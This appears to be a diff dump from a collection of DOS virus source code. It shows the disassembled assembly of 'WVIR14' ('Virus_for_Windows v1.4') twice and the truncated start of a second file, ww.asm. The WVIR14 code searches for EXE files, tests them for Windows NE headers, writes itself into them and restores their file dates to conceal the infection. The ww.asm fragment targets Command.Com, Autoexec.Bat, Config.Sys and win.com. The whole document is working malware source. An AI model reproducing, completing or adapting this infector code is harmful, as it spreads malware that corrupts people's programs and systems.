data_21e equ 19Eh ;*
data_22e equ 1A0h ;*
data_23e equ 1A2h ;*
;------------------------------------------------------------ seg_a ----
seg_a segment byte public
assume cs:seg_a , ds:seg_a , ss:stack_seg_b
db 249 dup (0)
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;
; Program Entry Point
;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
wvir14 proc far
start:
mov ax,cs
add ax,3Bh
mov ds,ax
cld ; Clear direction
push es
push ds
pop es
mov si,data_18e
mov di,data_19e
mov cx,0Dh
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov dx,data_17e
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov dx,17Bh
xor cx,cx ; Zero register
mov ah,4Eh
loc_1:
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_2 ; Jump if carry Set
mov dx,data_18e
call sub_1
mov ah,4Fh ; 'O'
jmp short loc_1
loc_2:
mov dx,data_19e
call sub_2
pop es
mov ax,4C00h
int 21h ; DOS Services ah=function 4Ch
; terminate with al=return code
wvir14 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_ret_4 ; Jump if carry Set
xchg ax,bx
mov si,100h
call sub_3
jc loc_3 ; Jump if carry Set
cmp word ptr [si+14h],100h
je loc_3 ; Jump if equal
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get file date+time, bx=handle
; returns cx=time, dx=time
push cx
push dx
call sub_4
pop dx
pop cx
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; set file date+time, bx=handle
; cx=time, dx=time
loc_3:
mov ah,3Eh
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_ret_4:
retn
sub_1 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_2 proc near
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_ret_4 ; Jump if carry Set
xchg ax,bx
mov si,100h
call sub_3
jc loc_3 ; Jump if carry Set
cmp word ptr [si+14h],100h
jne loc_3 ; Jump if not equal
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get file date+time, bx=handle
; returns cx=time, dx=time
push cx
push dx
call sub_5
call sub_6
pop dx
pop cx
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; set file date+time, bx=handle
; cx=time, dx=time
jmp short loc_3
sub_2 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_3 proc near
call sub_8
cmp word ptr [si],5A4Dh
jne loc_5 ; Jump if not equal
cmp word ptr [si+18h],40h
jb loc_5 ; Jump if below
mov ax,[si+3Ch]
mov dx,[si+3Eh]
call sub_16
mov ds:data_20e,ax
mov ds:data_21e,dx
call sub_8
cmp word ptr [si],454Eh
jne loc_5 ; Jump if not equal
cmp word ptr [si+0Ch],302h
jne loc_5 ; Jump if not equal
cmp byte ptr [si+32h],4
jne loc_5 ; Jump if not equal
cmp word ptr [si+36h],802h
jne loc_5 ; Jump if not equal
clc ; Clear carry flag
retn
loc_5:
stc ; Set carry flag
loc_ret_6:
retn
sub_3 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_4 proc near
mov ax,[si+16h]
mov dx,140h
call sub_7
cmp word ptr ds:data_13e,3AEh
jb loc_ret_6 ; Jump if below
cmp byte ptr ds:data_14e,50h ; 'P'
jne loc_ret_6 ; Jump if not equal
mov ax,[si+0Eh]
mov dx,148h
call sub_7
cmp word ptr ds:data_16e,4A8h
jb loc_ret_6 ; Jump if below
mov ax,ds:data_12e
call sub_15
mov dx,1A8h
mov cx,2AEh
nop
call sub_9
call sub_13
mov dx,1A8h
mov cx,2AEh
nop
call sub_12
mov ax,word ptr ds:[148h]
call sub_15
mov dx,1A8h
mov cx,0A8h
nop
call sub_9
call sub_13
mov dx,1A8h
mov cx,0A8h
nop
call sub_12
push word ptr ds:[144h]
pop word ptr ds:[1A2h]
and word ptr ds:[144h],0FEFFh
mov ax,[si+16h]
mov dx,140h
call sub_10
xor ax,ax ; Zero register
cwd ; Word to double word
call sub_14
push word ptr [si+14h]
pop word ptr ds:[1A0h]
mov word ptr [si+14h],100h
call sub_11
mov ax,word ptr ds:[140h]
call sub_15
push ds
push cs
pop ds
mov dx,100h
mov cx,2AEh
nop
call sub_12
pop ds
mov ax,word ptr ds:[148h]
call sub_15
mov dx,100h
mov cx,0A8h
nop
call sub_12
retn
sub_4 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_5 proc near
mov ax,[si+0Eh]
mov dx,148h
call sub_7
mov ax,ds:data_15e
call sub_15
mov dx,100h
mov cx,0A8h
nop
call sub_9
retn
sub_5 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_6 proc near
push word ptr ds:data_23e
pop word ptr ds:data_14e
mov ax,[si+16h]
mov dx,140h
call sub_10
push word ptr ds:data_22e
pop word ptr [si+14h]
xor ax,ax ; Zero register
cwd ; Word to double word
call sub_14
call sub_11
call sub_13
sub ax,0A8h
nop
sbb dx,0
push ax
push dx
call sub_16
mov dx,1A8h
mov cx,0A8h
nop
call sub_9
mov ax,ds:data_15e
call sub_15
mov dx,1A8h
mov cx,0A8h
nop
call sub_12
pop dx
pop ax
sub ax,2AEh
nop
sbb dx,0
push ax
push dx
call sub_16
mov dx,1A8h
mov cx,2AEh
nop
call sub_9
mov ax,word ptr ds:[140h]
call sub_15
mov dx,1A8h
mov cx,2AEh
nop
call sub_12
pop dx
pop ax
call sub_16
mov cx,0
call sub_12
retn
sub_6 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_7 proc near
push dx
dec ax
mov cx,8
mul cx ; dx:ax = reg * ax
add ax,[si+22h]
adc dx,0
call sub_14
pop dx
mov cx,8
jmp short loc_7
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_8:
mov dx,data_11e
mov cx,40h
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_9:
loc_7:
mov ah,3Fh
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
retn
sub_7 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_10 proc near
push dx
dec ax
mov cx,8
mul cx ; dx:ax = reg * ax
add ax,[si+22h]
adc dx,0
call sub_14
pop dx
mov cx,8
jmp short loc_8
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_11:
mov dx,data_11e
mov cx,40h
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_12:
loc_8:
mov ah,40h
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
retn
sub_10 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_13 proc near
mov ax,4202h
xor cx,cx ; Zero register
cwd ; Word to double word
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
retn
sub_13 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_14 proc near
add ax,ds:data_20e
adc dx,ds:data_21e
jmp short loc_9
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_15:
mov cx,10h
mul cx ; dx:ax = reg * ax
add ax,100h
adc dx,0
jmp short loc_9
db 33h,0C0h, 99h
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_16:
loc_9:
xchg cx,dx
xchg ax,dx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
retn
sub_14 endp
;* No entry point to code
xchg cx,dx
xchg ax,dx
mov ax,4201h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
retn
db ' Virus_for_Windows v1.4 '
db 259 dup (0)
db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
db 'bbbbbbbbccccccccdddddddddddddddd'
db 'ddddddddddddddddddddddddddd*.EXE'
db 0
db 'eeeeeeeeeeeee'
db 00h, 00h, 80h, 00h, 00h, 00h
db 5Ch, 00h, 00h, 00h
db 6Ch
db 11 dup (0)
db 4Dh, 4Bh, 39h, 32h
db 8 dup (0)
seg_a ends
;------------------------------------------------------ stack_seg_b ----
stack_seg_b segment word stack 'STACK'
db 8192 dup (0)
stack_seg_b ends
end start

487
MSDOS/Virus.MSDOS.Unknown.wvir14a.asm Normal file
View File

@ -0,0 +1,487 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ WVIR14 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 1-Sep-92 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: none ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_11e equ 100h ;*
data_12e equ 140h ;*
data_13e equ 142h ;*
data_14e equ 144h ;*
data_15e equ 148h ;*
data_16e equ 14Ah ;*
data_17e equ 150h ;*
data_18e equ 16Eh ;*
data_19e equ 181h ;*
data_20e equ 19Ch ;*
data_21e equ 19Eh ;*
data_22e equ 1A0h ;*
data_23e equ 1A2h ;*
;------------------------------------------------------------ seg_a ----
seg_a segment byte public
assume cs:seg_a , ds:seg_a , ss:stack_seg_b
db 249 dup (0)
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;
; Program Entry Point
;
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
wvir14 proc far
start:
mov ax,cs
add ax,3Bh
mov ds,ax
cld ; Clear direction
push es
push ds
pop es
mov si,data_18e
mov di,data_19e
mov cx,0Dh
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov dx,data_17e
mov ah,1Ah
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov dx,17Bh
xor cx,cx ; Zero register
mov ah,4Eh
loc_1:
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_2 ; Jump if carry Set
mov dx,data_18e
call sub_1
mov ah,4Fh ; 'O'
jmp short loc_1
loc_2:
mov dx,data_19e
call sub_2
pop es
mov ax,4C00h
int 21h ; DOS Services ah=function 4Ch
; terminate with al=return code
wvir14 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_1 proc near
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_ret_4 ; Jump if carry Set
xchg ax,bx
mov si,100h
call sub_3
jc loc_3 ; Jump if carry Set
cmp word ptr [si+14h],100h
je loc_3 ; Jump if equal
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get file date+time, bx=handle
; returns cx=time, dx=time
push cx
push dx
call sub_4
pop dx
pop cx
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; set file date+time, bx=handle
; cx=time, dx=time
loc_3:
mov ah,3Eh
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
loc_ret_4:
retn
sub_1 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_2 proc near
mov ax,3D02h
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
jc loc_ret_4 ; Jump if carry Set
xchg ax,bx
mov si,100h
call sub_3
jc loc_3 ; Jump if carry Set
cmp word ptr [si+14h],100h
jne loc_3 ; Jump if not equal
mov ax,5700h
int 21h ; DOS Services ah=function 57h
; get file date+time, bx=handle
; returns cx=time, dx=time
push cx
push dx
call sub_5
call sub_6
pop dx
pop cx
mov ax,5701h
int 21h ; DOS Services ah=function 57h
; set file date+time, bx=handle
; cx=time, dx=time
jmp short loc_3
sub_2 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_3 proc near
call sub_8
cmp word ptr [si],5A4Dh
jne loc_5 ; Jump if not equal
cmp word ptr [si+18h],40h
jb loc_5 ; Jump if below
mov ax,[si+3Ch]
mov dx,[si+3Eh]
call sub_16
mov ds:data_20e,ax
mov ds:data_21e,dx
call sub_8
cmp word ptr [si],454Eh
jne loc_5 ; Jump if not equal
cmp word ptr [si+0Ch],302h
jne loc_5 ; Jump if not equal
cmp byte ptr [si+32h],4
jne loc_5 ; Jump if not equal
cmp word ptr [si+36h],802h
jne loc_5 ; Jump if not equal
clc ; Clear carry flag
retn
loc_5:
stc ; Set carry flag
loc_ret_6:
retn
sub_3 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_4 proc near
mov ax,[si+16h]
mov dx,140h
call sub_7
cmp word ptr ds:data_13e,3AEh
jb loc_ret_6 ; Jump if below
cmp byte ptr ds:data_14e,50h ; 'P'
jne loc_ret_6 ; Jump if not equal
mov ax,[si+0Eh]
mov dx,148h
call sub_7
cmp word ptr ds:data_16e,4A8h
jb loc_ret_6 ; Jump if below
mov ax,ds:data_12e
call sub_15
mov dx,1A8h
mov cx,2AEh
nop
call sub_9
call sub_13
mov dx,1A8h
mov cx,2AEh
nop
call sub_12
mov ax,word ptr ds:[148h]
call sub_15
mov dx,1A8h
mov cx,0A8h
nop
call sub_9
call sub_13
mov dx,1A8h
mov cx,0A8h
nop
call sub_12
push word ptr ds:[144h]
pop word ptr ds:[1A2h]
and word ptr ds:[144h],0FEFFh
mov ax,[si+16h]
mov dx,140h
call sub_10
xor ax,ax ; Zero register
cwd ; Word to double word
call sub_14
push word ptr [si+14h]
pop word ptr ds:[1A0h]
mov word ptr [si+14h],100h
call sub_11
mov ax,word ptr ds:[140h]
call sub_15
push ds
push cs
pop ds
mov dx,100h
mov cx,2AEh
nop
call sub_12
pop ds
mov ax,word ptr ds:[148h]
call sub_15
mov dx,100h
mov cx,0A8h
nop
call sub_12
retn
sub_4 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_5 proc near
mov ax,[si+0Eh]
mov dx,148h
call sub_7
mov ax,ds:data_15e
call sub_15
mov dx,100h
mov cx,0A8h
nop
call sub_9
retn
sub_5 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_6 proc near
push word ptr ds:data_23e
pop word ptr ds:data_14e
mov ax,[si+16h]
mov dx,140h
call sub_10
push word ptr ds:data_22e
pop word ptr [si+14h]
xor ax,ax ; Zero register
cwd ; Word to double word
call sub_14
call sub_11
call sub_13
sub ax,0A8h
nop
sbb dx,0
push ax
push dx
call sub_16
mov dx,1A8h
mov cx,0A8h
nop
call sub_9
mov ax,ds:data_15e
call sub_15
mov dx,1A8h
mov cx,0A8h
nop
call sub_12
pop dx
pop ax
sub ax,2AEh
nop
sbb dx,0
push ax
push dx
call sub_16
mov dx,1A8h
mov cx,2AEh
nop
call sub_9
mov ax,word ptr ds:[140h]
call sub_15
mov dx,1A8h
mov cx,2AEh
nop
call sub_12
pop dx
pop ax
call sub_16
mov cx,0
call sub_12
retn
sub_6 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_7 proc near
push dx
dec ax
mov cx,8
mul cx ; dx:ax = reg * ax
add ax,[si+22h]
adc dx,0
call sub_14
pop dx
mov cx,8
jmp short loc_7
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_8:
mov dx,data_11e
mov cx,40h
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_9:
loc_7:
mov ah,3Fh
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
retn
sub_7 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_10 proc near
push dx
dec ax
mov cx,8
mul cx ; dx:ax = reg * ax
add ax,[si+22h]
adc dx,0
call sub_14
pop dx
mov cx,8
jmp short loc_8
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_11:
mov dx,data_11e
mov cx,40h
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_12:
loc_8:
mov ah,40h
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
retn
sub_10 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_13 proc near
mov ax,4202h
xor cx,cx ; Zero register
cwd ; Word to double word
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
retn
sub_13 endp
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
; SUBROUTINE
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
sub_14 proc near
add ax,ds:data_20e
adc dx,ds:data_21e
jmp short loc_9
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_15:
mov cx,10h
mul cx ; dx:ax = reg * ax
add ax,100h
adc dx,0
jmp short loc_9
db 33h,0C0h, 99h
;ßßßß External Entry into Subroutine ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
sub_16:
loc_9:
xchg cx,dx
xchg ax,dx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
retn
sub_14 endp
;* No entry point to code
xchg cx,dx
xchg ax,dx
mov ax,4201h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
retn
db ' Virus_for_Windows v1.4 '
db 259 dup (0)
db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
db 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
db 'bbbbbbbbccccccccdddddddddddddddd'
db 'ddddddddddddddddddddddddddd*.EXE'
db 0
db 'eeeeeeeeeeeee'
db 00h, 00h, 80h, 00h, 00h, 00h
db 5Ch, 00h, 00h, 00h
db 6Ch
db 11 dup (0)
db 4Dh, 4Bh, 39h, 32h
db 8 dup (0)
seg_a ends
;------------------------------------------------------ stack_seg_b ----
stack_seg_b segment word stack 'STACK'
db 8192 dup (0)
stack_seg_b ends
end start

225
MSDOS/Virus.MSDOS.Unknown.ww.asm Normal file
View File

@ -0,0 +1,225 @@
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
ww proc far
start:
jmp loc_2
db 12 dup (90h)
db 0CDh, 20h
loc_2:
jmp short loc_3
db 90h, 2Ah, 2Eh, 63h, 6Fh, 6Dh
db 00h, 00h
data_8 db 'C:\Command.Com', 0
db 'C:\Autoexec.Bat', 0
db 'C:\Config.Sys', 0
db '\win'
data_12 dw 6F64h
db 'ws\win.com'
db 00h,0E9h, 0Eh, 00h, 90h,0C8h
db 01h
loc_3:
mov bx,101h
mov ah,[bx]
mov bx,102h
mov al,[bx]
xchg al,ah
add ax,3
mov si,ax
mov ah,1Ah
lea dx,[si+2C8h]
add dx,6
int 21h
mov ah,4Eh
lea dx,[si+103h]
mov cx,6
int 21h
cmp ax,12h
je loc_7
lea dx,[si+10Ah]
jmp short loc_6
db 90h
loc_5:
mov ah,4Dh
int 21h
mov ah,4Fh
int 21h
cmp ax,12h
je loc_7
lea dx,[si+2C8h]
add dx,24h
loc_6:
mov ah,3Dh
mov al,2
int 21h
mov bx,ax
mov ah,42h
mov al,2
mov dx,0
mov cx,0
int 21h
push ax
sub ax,6
mov dx,ax
mov ah,42h
mov al,0
mov cx,0
int 21h
mov ah,3Fh
mov cx,1
lea dx,[si+14Bh]
int 21h
mov ah,byte ptr data_8+30h[si]
cmp ah,42h
jne loc_8
jmp short loc_5
loc_7:
jmp short loc_9
db 90h
loc_8:
mov ah,42h
mov al,0
mov dx,0
mov cx,0
int 21h
mov ax,3F00h
mov cx,3
lea dx,[si+2C8h]
add dx,3
